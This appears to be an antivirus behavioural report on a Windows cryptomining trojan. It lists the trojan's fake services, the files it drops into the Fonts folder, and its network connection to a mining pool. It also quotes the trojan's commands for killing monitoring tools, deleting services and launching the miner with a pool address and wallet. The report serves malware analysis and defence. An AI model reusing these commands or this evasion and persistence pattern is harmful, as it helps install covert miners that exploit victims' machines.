Technical Information
To ensure autorun and distribution:
Creates the following services:
- [<HKLM>\SYSTEM\ControlSet001\Services\Samserver] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\Samserver] 'ImagePath' = '%WINDIR%\Fonts\svchost.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\RpcEptManger] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\RpcEptManger] 'ImagePath' = '%WINDIR%\Fonts\svchost.exe'
Malicious functions:
Executes the following:
- '<SYSTEM32>\taskkill.exe' /im rundll32.exe /f /T
- '<SYSTEM32>\taskkill.exe' /im perfmon.exe /f /T
- '<SYSTEM32>\taskkill.exe' /im ProcessHacker.exe /f /T
- '<SYSTEM32>\taskkill.exe' /im procexp.exe /f /T
- '<SYSTEM32>\taskkill.exe' /im autoruns.exe /f /T
- '<SYSTEM32>\net.exe' stop mssecsvc2.0
- '<SYSTEM32>\net.exe' stop lanmanserver /y
- '<SYSTEM32>\taskkill.exe' /im taskmgr.exe /f /T
- '<SYSTEM32>\net.exe' stop Natihial
Injects code into
the following system processes:
- %WINDIR%\XXInstall\ps.exe
Modifies file system:
Creates the following files:
- <Current directory>\tem.vbs
- %WINDIR%\Fonts\1sass.exe
- %WINDIR%\Fonts\demo.bat
- %WINDIR%\Fonts\svchost.exe
- %WINDIR%\Fonts\wininit.exe
Sets the 'hidden' attribute to the following files:
- <Current directory>\tem.vbs
- %WINDIR%\Fonts\1sass.exe
- %WINDIR%\Fonts\wininit.exe
- %WINDIR%\Fonts\svchost.exe
Deletes the following files:
- <Full path to file>
Network activity:
Connects to:
- 'li###.alibuf.com':7777
UDP:
- DNS ASK li###.alibuf.com
Miscellaneous:
Searches for the following windows:
- ClassName: '' WindowName: ''
Creates and executes the following:
- '%WINDIR%\Fonts\svchost.exe' set Samserver Security Accounts Services
- '%WINDIR%\Fonts\svchost.exe' install Samserver 1sass.exe -o stratum+tcp://liang.alibuf.com:7777 -u 45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr -p x -k
- '<SYSTEM32>\wscript.exe' "<Current directory>\tem.vbs"
- '%WINDIR%\Fonts\1sass.exe' -o stratum+tcp://liang.alibuf.com:7777 -u 45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr -p x -k
- '%WINDIR%\Fonts\svchost.exe' start Samserver
- '%WINDIR%\Fonts\svchost.exe' set Samserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
- '%WINDIR%\Fonts\svchost.exe' set RpcEptManger Description RPC performance library information from Windows Management.
- '%WINDIR%\Fonts\svchost.exe' set RpcEptManger DisplayName RPC Endpoint Manger
- '%WINDIR%\Fonts\svchost.exe' install RpcEptManger %WINDIR%\Fonts\wininit.exe
- '%WINDIR%\Fonts\wininit.exe'
- '%WINDIR%\Fonts\svchost.exe'
- '%WINDIR%\Fonts\svchost.exe' start RpcEptManger
Executes the following:
- '<SYSTEM32>\cmd.exe' /c taskkill /im rundll32.exe /f /T
- '<SYSTEM32>\cmd.exe' /c taskkill /im autoruns.exe /f /T
- '<SYSTEM32>\cmd.exe' /c taskkill /im taskmgr.exe /f /T
- '<SYSTEM32>\attrib.exe' -s -h -r -a C:\ProgramData
- '<SYSTEM32>\cmd.exe' /c attrib +s +a %WINDIR%\Fonts
- '<SYSTEM32>\attrib.exe' +s +a %WINDIR%\Fonts
- '%WINDIR%\XXInstall\ps.exe' +s +a %WINDIR%\Fonts
- '<SYSTEM32>\cmd.exe' /c taskkill /im ProcessHacker.exe /f /T
- '<SYSTEM32>\cmd.exe' /c taskkill /im perfmon.exe /f /T
- '<SYSTEM32>\cmd.exe' /c taskkill /im procexp.exe /f /T
- '<SYSTEM32>\attrib.exe' -s -h -r -a %WINDIR%\Fonts
- '<SYSTEM32>\net1.exe' stop lanmanserver /y
- '<SYSTEM32>\sc.exe' delete lanmanserver
- '<SYSTEM32>\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts
- '<SYSTEM32>\sc.exe' config lanmanserver start= DISABLED 2>nul
- '<SYSTEM32>\net1.exe' stop Natihial
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Fonts\demo.bat
- '<SYSTEM32>\sc.exe' delete Natihial
- '<SYSTEM32>\sc.exe' delete mssecsvc2.0
- '<SYSTEM32>\net1.exe' stop mssecsvc2.0
